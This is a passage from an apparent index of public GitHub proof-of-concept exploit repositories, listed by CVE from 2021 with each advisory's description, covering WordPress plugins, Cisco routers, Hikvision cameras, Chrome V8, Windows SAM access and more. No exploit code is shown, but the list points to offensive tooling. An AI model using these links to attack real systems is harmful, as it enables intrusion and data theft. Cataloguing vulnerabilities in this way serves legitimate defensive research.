A vulnerability in the user registration component found in the ~/src/Classes/RegistrationAuth.php file of the ProfilePress WordPress plugin made it possible for users to register on sites as an administrator. This issue affects versions 3.0.0 - 3.1.3. .
- [RandomRobbieBF/CVE-2021-34621](https://github.com/RandomRobbieBF/CVE-2021-34621)
- [K3ysTr0K3R/CVE-2021-34621-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2021-34621-EXPLOIT)
- [navreet1425/CVE-2021-34621](https://github.com/navreet1425/CVE-2021-34621)
### CVE-2021-34646 (2021-08-30)
Versions up to, and including, 5.4.3, of the Booster for WooCommerce WordPress plugin are vulnerable to authentication bypass via the process_email_verification function due to a random token generation weakness in the reset_and_mail_activation_link function found in the ~/includes/class-wcj-emails-verification.php file. This allows attackers to impersonate users and trigger an email address verification for arbitrary accounts, including administrative accounts, and automatically be logged in as that user, including any site administrators. This requires the Email Verification module to be active in the plugin and the Login User After Successful Verification setting to be enabled, which it is by default.
- [motikan2010/CVE-2021-34646](https://github.com/motikan2010/CVE-2021-34646)
- [0xB455/CVE-2021-34646](https://github.com/0xB455/CVE-2021-34646)
### CVE-2021-34730 (2021-08-18)
A vulnerability in the Universal Plug-and-Play (UPnP) service of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an unauthenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly, resulting in a denial of service (DoS) condition. This vulnerability is due to improper validation of incoming UPnP traffic. An attacker could exploit this vulnerability by sending a crafted UPnP request to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a DoS condition. Cisco has not released software updates that address this vulnerability.
- [badmonkey7/CVE-2021-34730](https://github.com/badmonkey7/CVE-2021-34730)
### CVE-2021-34767 (2021-09-23)
A vulnerability in IPv6 traffic processing of Cisco IOS XE Wireless Controller Software for Cisco Catalyst 9000 Family Wireless Controllers could allow an unauthenticated, adjacent attacker to cause a Layer 2 (L2) loop in a configured VLAN, resulting in a denial of service (DoS) condition for that VLAN. The vulnerability is due to a logic error when processing specific link-local IPv6 traffic. An attacker could exploit this vulnerability by sending a crafted IPv6 packet that would flow inbound through the wired interface of an affected device. A successful exploit could allow the attacker to cause traffic drops in the affected VLAN, thus triggering the DoS condition.
- [lukejenkins/CVE-2021-34767](https://github.com/lukejenkins/CVE-2021-34767)
### CVE-2021-34824 (2021-06-29)
Istio (1.8.x, 1.9.0-1.9.5 and 1.10.0-1.10.1) contains a remotely exploitable vulnerability where credentials specified in the Gateway and DestinationRule credentialName field can be accessed from different namespaces.
- [rsalmond/CVE-2021-34824](https://github.com/rsalmond/CVE-2021-34824)
### CVE-2021-35042 (2021-07-02)
Django 3.1.x before 3.1.13 and 3.2.x before 3.2.5 allows QuerySet.order_by SQL injection if order_by is untrusted input from a client of a web application.
- [YouGina/CVE-2021-35042](https://github.com/YouGina/CVE-2021-35042)
- [mrlihd/CVE-2021-35042](https://github.com/mrlihd/CVE-2021-35042)
- [r4vi/CVE-2021-35042](https://github.com/r4vi/CVE-2021-35042)
- [zer0qs/CVE-2021-35042](https://github.com/zer0qs/CVE-2021-35042)
- [LUUANHDUC/CVE-2021-35042](https://github.com/LUUANHDUC/CVE-2021-35042)
### CVE-2021-35064 (2021-07-12)
KramerAV VIAWare, all tested versions, allow privilege escalation through misconfiguration of sudo. Sudoers permits running of multiple dangerous commands, including unzip, systemctl and dpkg.
- [Chocapikk/CVE-2021-35064](https://github.com/Chocapikk/CVE-2021-35064)
### CVE-2021-35211 (2021-07-14)
Microsoft discovered a remote code execution (RCE) vulnerability in the SolarWinds Serv-U product utilizing a Remote Memory Escape Vulnerability. If exploited, a threat actor may be able to gain privileged access to the machine hosting Serv-U Only. SolarWinds Serv-U Managed File Transfer and Serv-U Secure FTP for Windows before 15.2.3 HF2 are affected by this vulnerability.
- [NattiSamson/Serv-U-CVE-2021-35211](https://github.com/NattiSamson/Serv-U-CVE-2021-35211)
- [0xhaggis/CVE-2021-35211](https://github.com/0xhaggis/CVE-2021-35211)
- [BishopFox/CVE-2021-35211](https://github.com/BishopFox/CVE-2021-35211)
### CVE-2021-35215 (2021-09-01)
Insecure deserialization leading to Remote Code Execution was detected in the Orion Platform version 2020.2.5. Authentication is required to exploit this vulnerability.
- [Y4er/CVE-2021-35215](https://github.com/Y4er/CVE-2021-35215)
### CVE-2021-35250 (2022-04-25)
A researcher reported a Directory Transversal Vulnerability in Serv-U 15.3. This may allow access to files relating to the Serv-U installation and server files. This issue has been resolved in Serv-U 15.3 Hotfix 1.
- [rissor41/SolarWinds-CVE-2021-35250](https://github.com/rissor41/SolarWinds-CVE-2021-35250)
### CVE-2021-35296 (2021-10-04)
An issue in the administrator authentication panel of PTCL HG150-Ub v3.0 allows attackers to bypass authentication via modification of the cookie value and Response Path.
- [afaq1337/CVE-2021-35296](https://github.com/afaq1337/CVE-2021-35296)
### CVE-2021-35464 (2021-07-22)
ForgeRock AM server before 7.0 has a Java deserialization vulnerability in the jato.pageSession parameter on multiple pages. The exploitation does not require authentication, and remote code execution can be triggered by sending a single crafted /ccversion/* request to the server. The vulnerability exists due to the usage of Sun ONE Application Framework (JATO) found in versions of Java 8 or earlier
- [Y4er/openam-CVE-2021-35464](https://github.com/Y4er/openam-CVE-2021-35464)
- [rood8008/CVE-2021-35464](https://github.com/rood8008/CVE-2021-35464)
### CVE-2021-35475 (2021-06-25)
SAS Environment Manager 2.5 allows XSS through the Name field when creating/editing a server. The XSS will prompt when editing the Configuration Properties.
- [saitamang/CVE-2021-35475](https://github.com/saitamang/CVE-2021-35475)
### CVE-2021-35492 (2021-10-05)
Wowza Streaming Engine through 4.8.11+5 could allow an authenticated, remote attacker to exhaust filesystem resources via the /enginemanager/server/vhost/historical.jsdata vhost parameter. This is due to the insufficient management of available filesystem resources. An attacker could exploit this vulnerability through the Virtual Host Monitoring section by requesting random virtual-host historical data and exhausting available filesystem resources. A successful exploit could allow the attacker to cause database errors and cause the device to become unresponsive to web-based management. (Manual intervention is required to free filesystem resources and return the application to an operational state.)
- [N4nj0/CVE-2021-35492](https://github.com/N4nj0/CVE-2021-35492)
### CVE-2021-35576 (2021-10-20)
Vulnerability in the Oracle Database Enterprise Edition Unified Audit component of Oracle Database Server. Supported versions that are affected are 12.1.0.2, 12.2.0.1 and 19c. Easily exploitable vulnerability allows high privileged attacker having Local Logon privilege with network access via Oracle Net to compromise Oracle Database Enterprise Edition Unified Audit. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Database Enterprise Edition Unified Audit accessible data. CVSS 3.1 Base Score 2.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N).
- [emad-almousa/CVE-2021-35576](https://github.com/emad-almousa/CVE-2021-35576)
### CVE-2021-35587 (2022-01-19)
Vulnerability in the Oracle Access Manager product of Oracle Fusion Middleware (component: OpenSSO Agent). Supported versions that are affected are 11.1.2.3.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Access Manager. Successful attacks of this vulnerability can result in takeover of Oracle Access Manager. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
- [ZZ-SOCMAP/CVE-2021-35587](https://github.com/ZZ-SOCMAP/CVE-2021-35587)
### CVE-2021-35616 (2021-10-20)
Vulnerability in the Oracle Transportation Management product of Oracle Supply Chain (component: UI Infrastructure). The supported version that is affected is 6.4.3. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Transportation Management. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Transportation Management accessible data as well as unauthorized read access to a subset of Oracle Transportation Management accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N).
- [Ofirhamam/OracleOTM](https://github.com/Ofirhamam/OracleOTM)
### CVE-2021-35956 (2021-06-30)
Stored cross-site scripting (XSS) in the embedded webserver of AKCP sensorProbe before SP480-20210624 enables remote authenticated attackers to introduce arbitrary JavaScript via the Sensor Description, Email (from/to/cc), System Name, and System Location fields.
- [tcbutler320/CVE-2021-35956](https://github.com/tcbutler320/CVE-2021-35956)
### CVE-2021-35958 (2021-06-30)
TensorFlow through 2.5.0 allows attackers to overwrite arbitrary files via a crafted archive when tf.keras.utils.get_file is used with extract=True. NOTE: the vendor's position is that tf.keras.utils.get_file is not intended for untrusted archives
- [miguelc49/CVE-2021-35958-2](https://github.com/miguelc49/CVE-2021-35958-2)
- [miguelc49/CVE-2021-35958-1](https://github.com/miguelc49/CVE-2021-35958-1)
### CVE-2021-35975 (2023-11-30)
Absolute path traversal vulnerability in the Systematica SMTP Adapter component (up to v2.0.1.101) in Systematica Radius (up to v.3.9.256.777) allows remote attackers to read arbitrary files via a full pathname in GET parameter "file" in URL. Also: affected components in same product - HTTP Adapter (up to v.1.8.0.15), MSSQL MessageBus Proxy (up to v.1.1.06), Financial Calculator (up to v.1.3.05), FIX Adapter (up to v.2.4.0.25)
- [fbkcs/CVE-2021-35975](https://github.com/fbkcs/CVE-2021-35975)
### CVE-2021-36260 (2021-09-22)
A command injection vulnerability in the web server of some Hikvision product. Due to the insufficient input validation, attacker can exploit the vulnerability to launch a command injection attack by sending some messages with malicious commands.
- [rabbitsafe/CVE-2021-36260](https://github.com/rabbitsafe/CVE-2021-36260)
- [Aiminsun/CVE-2021-36260](https://github.com/Aiminsun/CVE-2021-36260)
- [TaroballzChen/CVE-2021-36260-metasploit](https://github.com/TaroballzChen/CVE-2021-36260-metasploit)
- [tuntin9x/CheckHKRCE](https://github.com/tuntin9x/CheckHKRCE)
- [Cuerz/CVE-2021-36260](https://github.com/Cuerz/CVE-2021-36260)
- [TakenoSite/Simple-CVE-2021-36260](https://github.com/TakenoSite/Simple-CVE-2021-36260)
- [r3t4k3r/hikvision_brute](https://github.com/r3t4k3r/hikvision_brute)
- [haingn/HIK-CVE-2021-36260-Exploit](https://github.com/haingn/HIK-CVE-2021-36260-Exploit)
### CVE-2021-36393 (2023-03-06)
In Moodle, an SQL injection risk was identified in the library fetching a user's recent courses.
- [StackOverflowExcept1on/CVE-2021-36393](https://github.com/StackOverflowExcept1on/CVE-2021-36393)
### CVE-2021-36394 (2023-03-06)
In Moodle, a remote code execution risk was identified in the Shibboleth authentication plugin.
- [dinhbaouit/CVE-2021-36394](https://github.com/dinhbaouit/CVE-2021-36394)
- [lavclash75/CVE-2021-36394-Pre-Auth-RCE-in-Moodle](https://github.com/lavclash75/CVE-2021-36394-Pre-Auth-RCE-in-Moodle)
### CVE-2021-36396 (2023-03-06)
In Moodle, insufficient redirect handling made it possible to blindly bypass cURL blocked hosts/allowed ports restrictions, resulting in a blind SSRF risk.
- [T0X1Cx/CVE-2021-36396-Exploit](https://github.com/T0X1Cx/CVE-2021-36396-Exploit)
### CVE-2021-36460 (2022-04-25)
VeryFitPro (com.veryfit2hr.second) 3.2.8 hashes the account's password locally on the device and uses the hash to authenticate in all communication with the backend API, including login, registration and changing of passwords. This allows an attacker in possession of a hash to takeover a user's account, rendering the benefits of storing hashed passwords in the database useless.
- [martinfrancois/CVE-2021-36460](https://github.com/martinfrancois/CVE-2021-36460)
### CVE-2021-36563 (2021-07-26)
The CheckMK management web console (versions 1.5.0 to 2.0.0) does not sanitise user input in various parameters of the WATO module. This allows an attacker to open a backdoor on the device with HTML content and interpreted by the browser (such as JavaScript or other client-side scripts), the XSS payload will be triggered when the user accesses some specific sections of the application. In the same sense a very dangerous potential way would be when an attacker who has the monitor role (not administrator) manages to get a stored XSS to steal the secretAutomation (for the use of the API in administrator mode) and thus be able to create another administrator user who has high privileges on the CheckMK monitoring web console. Another way is that persistent XSS allows an attacker to modify the displayed content or change the victim's information. Successful exploitation requires access to the web management interface, either with valid credentials or with a hijacked session.
- [Edgarloyola/CVE-2021-36563](https://github.com/Edgarloyola/CVE-2021-36563)
### CVE-2021-36593
- [mir-hossein/Statement](https://github.com/mir-hossein/Statement)
### CVE-2021-36630 (2023-01-18)
DDOS reflection amplification vulnerability in eAut module of Ruckus Wireless SmartZone controller that allows remote attackers to perform DOS attacks via crafted request.
- [lixiang957/CVE-2021-36630](https://github.com/lixiang957/CVE-2021-36630)
### CVE-2021-36747 (2021-07-20)
Blackboard Learn through 9.1 allows XSS by an authenticated user via the Feedback to Learner form.
- [cseasholtz/CVE-2021-36747](https://github.com/cseasholtz/CVE-2021-36747)
### CVE-2021-36749 (2021-09-24)
In the Druid ingestion system, the InputSource is used for reading data from a certain data source. However, the HTTP InputSource allows authenticated users to read data from other sources than intended, such as the local file system, with the privileges of the Druid server process. This is not an elevation of privilege when users access Druid directly, since Druid also provides the Local InputSource, which allows the same level of access. But it is problematic when users interact with Druid indirectly through an application that allows users to specify the HTTP InputSource, but not the Local InputSource. In this case, users could bypass the application-level restriction by passing a file URL to the HTTP InputSource. This issue was previously mentioned as being fixed in 0.21.0 as per CVE-2021-26920 but was not fixed in 0.21.0 or 0.21.1.
- [sma11new/PocList](https://github.com/sma11new/PocList)
- [BrucessKING/CVE-2021-36749](https://github.com/BrucessKING/CVE-2021-36749)
- [zwlsix/apache_druid_CVE-2021-36749](https://github.com/zwlsix/apache_druid_CVE-2021-36749)
- [Jun-5heng/CVE-2021-36749](https://github.com/Jun-5heng/CVE-2021-36749)
### CVE-2021-36750 (2021-12-22)
ENC DataVault before 7.2 and VaultAPI v67 mishandle key derivation, making it easier for attackers to determine the passwords of all DataVault users (across USB drives sold under multiple brand names).
- [mamba-4-ever/CVE-2021-36750](https://github.com/mamba-4-ever/CVE-2021-36750)
### CVE-2021-36782 (2022-09-07)
A Cleartext Storage of Sensitive Information vulnerability in SUSE Rancher allows authenticated Cluster Owners, Cluster Members, Project Owners, Project Members and User Base to use the Kubernetes API to retrieve plaintext version of sensitive data. This issue affects: SUSE Rancher Rancher versions prior to 2.5.16; Rancher versions prior to 2.6.7.
- [fe-ax/tf-cve-2021-36782](https://github.com/fe-ax/tf-cve-2021-36782)
### CVE-2021-36798 (2021-08-09)
A Denial-of-Service (DoS) vulnerability was discovered in Team Server in HelpSystems Cobalt Strike 4.2 and 4.3. It allows remote attackers to crash the C2 server thread and block beacons' communication with it.
- [M-Kings/CVE-2021-36798](https://github.com/M-Kings/CVE-2021-36798)
- [JamVayne/CobaltStrikeDos](https://github.com/JamVayne/CobaltStrikeDos)
- [sponkmonk/CobaltSploit](https://github.com/sponkmonk/CobaltSploit)
### CVE-2021-36799 (2021-07-19)
KNX ETS5 through 5.7.6 uses the hard-coded password ETS5Password, with a salt value of Ivan Medvedev, allowing local users to read project information. NOTE: This vulnerability only affects products that are no longer supported by the maintainer
- [robertguetzkow/ets5-password-recovery](https://github.com/robertguetzkow/ets5-password-recovery)
### CVE-2021-36808 (2021-10-30)
A local attacker could bypass the app password using a race condition in Sophos Secure Workspace for Android before version 9.7.3115.
- [ctuIhu/CVE-2021-36808](https://github.com/ctuIhu/CVE-2021-36808)
### CVE-2021-36934 (2021-07-22)
<p>An elevation of privilege vulnerability exists because of overly permissive Access Control Lists (ACLs) on multiple system files, including the Security Accounts Manager (SAM) database. An attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.</p>\n<p>An attacker must have the ability to execute code on a victim system to exploit this vulnerability.</p>\n<p>After installing this security update, you <em>must</em> manually delete all shadow copies of system files, including the SAM database, to fully mitigate this vulnerabilty. <strong>Simply installing this security update will not fully mitigate this vulnerability.</strong> See <a href="https://support.microsoft.com/topic/1ceaa637-aaa3-4b58-a48b-baf72a2fa9e7">KB5005357- Delete Volume Shadow Copies</a>.</p>\n
- [HuskyHacks/ShadowSteal](https://github.com/HuskyHacks/ShadowSteal)
- [JoranSlingerland/CVE-2021-36934](https://github.com/JoranSlingerland/CVE-2021-36934)
- [n3tsurge/CVE-2021-36934](https://github.com/n3tsurge/CVE-2021-36934)
- [Wh04m1001/VSSCopy](https://github.com/Wh04m1001/VSSCopy)
- [WiredPulse/Invoke-HiveNightmare](https://github.com/WiredPulse/Invoke-HiveNightmare)
- [romarroca/SeriousSam](https://github.com/romarroca/SeriousSam)
- [WiredPulse/Invoke-HiveDreams](https://github.com/WiredPulse/Invoke-HiveDreams)
- [tda90/CVE-2021-36934](https://github.com/tda90/CVE-2021-36934)
- [VertigoRay/CVE-2021-36934](https://github.com/VertigoRay/CVE-2021-36934)
- [bytesizedalex/CVE-2021-36934](https://github.com/bytesizedalex/CVE-2021-36934)
- [Preventions/CVE-2021-36934](https://github.com/Preventions/CVE-2021-36934)
- [Sp00p64/PyNightmare](https://github.com/Sp00p64/PyNightmare)
- [jmaddington/Serious-Sam---CVE-2021-36934-Mitigation-for-Datto-RMM](https://github.com/jmaddington/Serious-Sam---CVE-2021-36934-Mitigation-for-Datto-RMM)
- [0x0D1n/CVE-2021-36934](https://github.com/0x0D1n/CVE-2021-36934)
- [exploitblizzard/CVE-2021-36934](https://github.com/exploitblizzard/CVE-2021-36934)
- [irissentinel/CVE-2021-36934](https://github.com/irissentinel/CVE-2021-36934)
- [websecnl/CVE-2021-36934](https://github.com/websecnl/CVE-2021-36934)
- [grishinpv/poc_CVE-2021-36934](https://github.com/grishinpv/poc_CVE-2021-36934)
- [shaktavist/SeriousSam](https://github.com/shaktavist/SeriousSam)
- [OlivierLaflamme/CVE-2021-36934-export-shadow-volume-POC](https://github.com/OlivierLaflamme/CVE-2021-36934-export-shadow-volume-POC)
- [chron1k/oxide_hive](https://github.com/chron1k/oxide_hive)
### CVE-2021-36949 (2021-08-12)
Microsoft Azure Active Directory Connect Authentication Bypass Vulnerability
- [Maxwitat/Check-AAD-Connect-for-CVE-2021-36949-vulnerability](https://github.com/Maxwitat/Check-AAD-Connect-for-CVE-2021-36949-vulnerability)
### CVE-2021-36955 (2021-09-15)
Windows Common Log File System Driver Elevation of Privilege Vulnerability
- [JiaJinRong12138/CVE-2021-36955-EXP](https://github.com/JiaJinRong12138/CVE-2021-36955-EXP)
### CVE-2021-36981 (2021-08-31)
In the server in SerNet verinice before 1.22.2, insecure Java deserialization allows remote authenticated attackers to execute arbitrary code.
- [0xBrAinsTorM/CVE-2021-36981](https://github.com/0xBrAinsTorM/CVE-2021-36981)
### CVE-2021-37152 (2021-08-10)
Multiple XSS issues exist in Sonatype Nexus Repository Manager 3 before 3.33.0. An authenticated attacker with the ability to add HTML files to a repository could redirect users to Nexus Repository Manager’s pages with code modifications.
- [SecurityAnalysts/CVE-2021-37152](https://github.com/SecurityAnalysts/CVE-2021-37152)
### CVE-2021-37580 (2021-11-16)
A flaw was found in Apache ShenYu Admin. The incorrect use of JWT in ShenyuAdminBootstrap allows an attacker to bypass authentication. This issue affected Apache ShenYu 2.3.0 and 2.4.0
- [rabbitsafe/CVE-2021-37580](https://github.com/rabbitsafe/CVE-2021-37580)
- [fengwenhua/CVE-2021-37580](https://github.com/fengwenhua/CVE-2021-37580)
- [Osyanina/westone-CVE-2021-37580-scanner](https://github.com/Osyanina/westone-CVE-2021-37580-scanner)
- [ZororoZ/CVE-2021-37580](https://github.com/ZororoZ/CVE-2021-37580)
- [Liang2580/CVE-2021-37580](https://github.com/Liang2580/CVE-2021-37580)
- [Wing-song/CVE-2021-37580](https://github.com/Wing-song/CVE-2021-37580)
- [CN016/Apache-ShenYu-Admin-JWT-CVE-2021-37580-](https://github.com/CN016/Apache-ShenYu-Admin-JWT-CVE-2021-37580-)
### CVE-2021-37624 (2021-10-25)
FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. Prior to version 1.10.7, FreeSWITCH does not authenticate SIP MESSAGE requests, leading to spam and message spoofing. By default, SIP requests of the type MESSAGE (RFC 3428) are not authenticated in the affected versions of FreeSWITCH. MESSAGE requests are relayed to SIP user agents registered with the FreeSWITCH server without requiring any authentication. Although this behaviour can be changed by setting the `auth-messages` parameter to `true`, it is not the default setting. Abuse of this security issue allows attackers to send SIP MESSAGE messages to any SIP user agent that is registered with the server without requiring authentication. Additionally, since no authentication is required, chat messages can be spoofed to appear to come from trusted entities. Therefore, abuse can lead to spam and enable social engineering, phishing and similar attacks. This issue is patched in version 1.10.7. Maintainers recommend that this SIP message type is authenticated by default so that FreeSWITCH administrators do not need to be explicitly set the `auth-messages` parameter. When following such a recommendation, a new parameter can be introduced to explicitly disable authentication.
- [0xInfection/PewSWITCH](https://github.com/0xInfection/PewSWITCH)
### CVE-2021-37678 (2021-08-12)
TensorFlow is an end-to-end open source platform for machine learning. In affected versions TensorFlow and Keras can be tricked to perform arbitrary code execution when deserializing a Keras model from YAML format. The [implementation](https://github.com/tensorflow/tensorflow/blob/460e000de3a83278fb00b61a16d161b1964f15f4/tensorflow/python/keras/saving/model_config.py#L66-L104) uses `yaml.unsafe_load` which can perform arbitrary code execution on the input. Given that YAML format support requires a significant amount of work, we have removed it for now. We have patched the issue in GitHub commit 23d6383eb6c14084a8fc3bdf164043b974818012. The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.
- [fran-CICS/ExploitTensorflowCVE-2021-37678](https://github.com/fran-CICS/ExploitTensorflowCVE-2021-37678)
### CVE-2021-37740 (2022-04-20)
A denial of service vulnerability exists in MDT's firmware for the KNXnet/IP Secure router SCN-IP100.03 and KNX IP interface SCN-IP000.03 before v3.0.4, that allows a remote attacker to turn the device unresponsive to all requests on the KNXnet/IP Secure layer, until the device is rebooted, via a SESSION_REQUEST frame with a modified total length field.
- [robertguetzkow/CVE-2021-37740](https://github.com/robertguetzkow/CVE-2021-37740)
### CVE-2021-37748 (2021-10-28)
Multiple buffer overflows in the limited configuration shell (/sbin/gs_config) on Grandstream HT801 devices before 1.0.29 allow remote authenticated users to execute arbitrary code as root via a crafted manage_if setting, thus bypassing the intended restrictions of this shell and taking full control of the device. There are default weak credentials that can be used to authenticate.
- [SECFORCE/CVE-2021-37748](https://github.com/SECFORCE/CVE-2021-37748)
### CVE-2021-37832 (2021-08-03)
A SQL injection vulnerability exists in version 3.0.2 of Hotel Druid when SQLite is being used as the application database. A malicious attacker can issue SQL commands to the SQLite database through the vulnerable idappartamenti parameter.
- [dievus/CVE-2021-37832](https://github.com/dievus/CVE-2021-37832)
- [AK-blank/CVE-2021-37832](https://github.com/AK-blank/CVE-2021-37832)
### CVE-2021-37833 (2021-08-03)
A reflected cross-site scripting (XSS) vulnerability exists in multiple pages in version 3.0.2 of the Hotel Druid application that allows for arbitrary execution of JavaScript commands.
- [dievus/CVE-2021-37833](https://github.com/dievus/CVE-2021-37833)
### CVE-2021-37910 (2021-11-12)
ASUS routers Wi-Fi protected access protocol (WPA2 and WPA3-SAE) has improper control of Interaction frequency vulnerability, an unauthenticated attacker can remotely disconnect other users' connections by sending specially crafted SAE authentication frames.
- [efchatz/easy-exploits](https://github.com/efchatz/easy-exploits)
### CVE-2021-37975 (2021-10-08)
Use after free in V8 in Google Chrome prior to 94.0.4606.71 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.
- [ssaroussi/CVE-2021-37975](https://github.com/ssaroussi/CVE-2021-37975)
### CVE-2021-37980 (2021-11-02)
Inappropriate implementation in Sandbox in Google Chrome prior to 94.0.4606.81 allowed a remote attacker to potentially bypass site isolation via Windows.
- [ZeusBox/CVE-2021-37980](https://github.com/ZeusBox/CVE-2021-37980)
### CVE-2021-38001 (2021-11-23)
Type confusion in V8 in Google Chrome prior to 95.0.4638.69 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.
- [maldiohead/TFC-Chrome-v8-bug-CVE-2021-38001-poc](https://github.com/maldiohead/TFC-Chrome-v8-bug-CVE-2021-38001-poc)
- [Peterpan0927/TFC-Chrome-v8-bug-CVE-2021-38001-poc](https://github.com/Peterpan0927/TFC-Chrome-v8-bug-CVE-2021-38001-poc)
### CVE-2021-38003 (2021-11-23)
Inappropriate implementation in V8 in Google Chrome prior to 95.0.4638.69 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.
- [SpiralBL0CK/Chrome-V8-RCE-CVE-2021-38003](https://github.com/SpiralBL0CK/Chrome-V8-RCE-CVE-2021-38003)
### CVE-2021-38149 (2021-08-06)
index.php/admin/add_user in Chikitsa Patient Management System 2.0.0 allows XSS.
- [jboogie15/CVE-2021-38149](https://github.com/jboogie15/CVE-2021-38149)
### CVE-2021-38163 (2021-09-14)
SAP NetWeaver (Visual Composer 7.0 RT) versions - 7.30, 7.31, 7.40, 7.50, without restriction, an attacker authenticated as a non-administrative user can upload a malicious file over a network and trigger its processing, which is capable of running operating system commands with the privilege of the Java Server process. These commands can be used to read or modify any information on the server or shut the server down making it unavailable.\n\n
- [core1impact/CVE-2021-38163](https://github.com/core1impact/CVE-2021-38163)
### CVE-2021-38185 (2021-08-07)
GNU cpio through 2.13 allows attackers to execute arbitrary code via a crafted pattern file, because of a dstring.c ds_fgetstr integer overflow that triggers an out-of-bounds heap write. NOTE: it is unclear whether there are common cases where the pattern file, associated with the -E option, is untrusted data.
- [fangqyi/cpiopwn](https://github.com/fangqyi/cpiopwn)
### CVE-2021-38295 (2021-10-14)
In Apache CouchDB, a malicious user with permission to create documents in a database is able to attach a HTML attachment to a document. If a CouchDB admin opens that attachment in a browser, e.g. via the CouchDB admin interface Fauxton, any JavaScript code embedded in that HTML attachment will be executed within the security context of that admin. A similar route is available with the already deprecated _show and _list functionality. This privilege escalation vulnerability allows an attacker to add or remove data in any database or make configuration changes. This issue affected Apache CouchDB prior to 3.1.2
- [ProfessionallyEvil/CVE-2021-38295-PoC](https://github.com/ProfessionallyEvil/CVE-2021-38295-PoC)
### CVE-2021-38297 (2021-10-18)
Go before 1.16.9 and 1.17.x before 1.17.2 has a Buffer Overflow via large arguments in a function invocation from a WASM module, when GOARCH=wasm GOOS=js is used.
- [gkrishnan724/CVE-2021-38297](https://github.com/gkrishnan724/CVE-2021-38297)
- [paras98/CVE-2021-38297-Go-wasm-Replication](https://github.com/paras98/CVE-2021-38297-Go-wasm-Replication)
### CVE-2021-38314 (2021-09-02)
The Gutenberg Template Library & Redux Framework plugin <= 4.2.11 for WordPress registered several AJAX actions available to unauthenticated users in the `includes` function in `redux-core/class-redux-core.php` that were unique to a given site but deterministic and predictable given that they were based on an md5 hash of the site URL with a known salt value of '-redux' and an md5 hash of the previous hash with a known salt value of '-support'. These AJAX actions could be used to retrieve a list of active plugins and their versions, the site's PHP version, and an unsalted md5 hash of site’s `AUTH_KEY` concatenated with the `SECURE_AUTH_KEY`.
- [orangmuda/CVE-2021-38314](https://github.com/orangmuda/CVE-2021-38314)
- [phrantom/cve-2021-38314](https://github.com/phrantom/cve-2021-38314)
- [shubhayu-64/CVE-2021-38314](https://github.com/shubhayu-64/CVE-2021-38314)
- [twseptian/cve-2021-38314](https://github.com/twseptian/cve-2021-38314)
- [c0ff33b34n/CVE-2021-38314](https://github.com/c0ff33b34n/CVE-2021-38314)
- [akhilkoradiya/CVE-2021-38314](https://github.com/akhilkoradiya/CVE-2021-38314)
- [0xGabe/CVE-2021-38314](https://github.com/0xGabe/CVE-2021-38314)
### CVE-2021-38540 (2021-09-09)
The variable import endpoint was not protected by authentication in Airflow >=2.0.0, <2.1.3. This allowed unauthenticated users to hit that endpoint to add/modify Airflow variables used in DAGs, potentially resulting in a denial of service, information disclosure or remote code execution. This issue affects Apache Airflow >=2.0.0, <2.1.3.
- [Captain-v-hook/PoC-for-CVE-2021-38540-](https://github.com/Captain-v-hook/PoC-for-CVE-2021-38540-)
### CVE-2021-38560 (2022-02-01)
Ivanti Service Manager 2021.1 allows reflected XSS via the appName parameter associated with ConfigDB calls, such as in RelocateAttachments.aspx.
- [os909/iVANTI-CVE-2021-38560](https://github.com/os909/iVANTI-CVE-2021-38560)
### CVE-2021-38583 (2021-08-13)
openBaraza HCM 3.1.6 does not properly neutralize user-controllable input, which allows reflected cross-site scripting (XSS) on multiple pages: hr/subscription.jsp and hr/application.jsp and and hr/index.jsp (with view= and data=).
- [charlesbickel/CVE-2021-38583](https://github.com/charlesbickel/CVE-2021-38583)
### CVE-2021-38602 (2021-08-12)
PluXML 5.8.7 allows Article Editing stored XSS via Headline or Content.
- [KielVaughn/CVE-2021-38602](https://github.com/KielVaughn/CVE-2021-38602)
### CVE-2021-38603 (2021-08-12)
PluXML 5.8.7 allows core/admin/profil.php stored XSS via the Information field.
- [KielVaughn/CVE-2021-38603](https://github.com/KielVaughn/CVE-2021-38603)
### CVE-2021-38619 (2021-08-13)
openBaraza HCM 3.1.6 does not properly neutralize user-controllable input: an unauthenticated remote attacker can conduct a stored cross-site scripting (XSS) attack against an administrative user from hr/subscription.jsp and hr/application.jsp and and hr/index.jsp (with view=).
- [charlesbickel/CVE-2021-38619](https://github.com/charlesbickel/CVE-2021-38619)
### CVE-2021-38639 (2021-09-15)
Win32k Elevation of Privilege Vulnerability
- [DarkSprings/CVE-2021-38639](https://github.com/DarkSprings/CVE-2021-38639)
### CVE-2021-38647 (2021-09-15)
Open Management Infrastructure Remote Code Execution Vulnerability
- [corelight/CVE-2021-38647](https://github.com/corelight/CVE-2021-38647)
- [midoxnet/CVE-2021-38647](https://github.com/midoxnet/CVE-2021-38647)
- [horizon3ai/CVE-2021-38647](https://github.com/horizon3ai/CVE-2021-38647)
- [Immersive-Labs-Sec/cve-2021-38647](https://github.com/Immersive-Labs-Sec/cve-2021-38647)
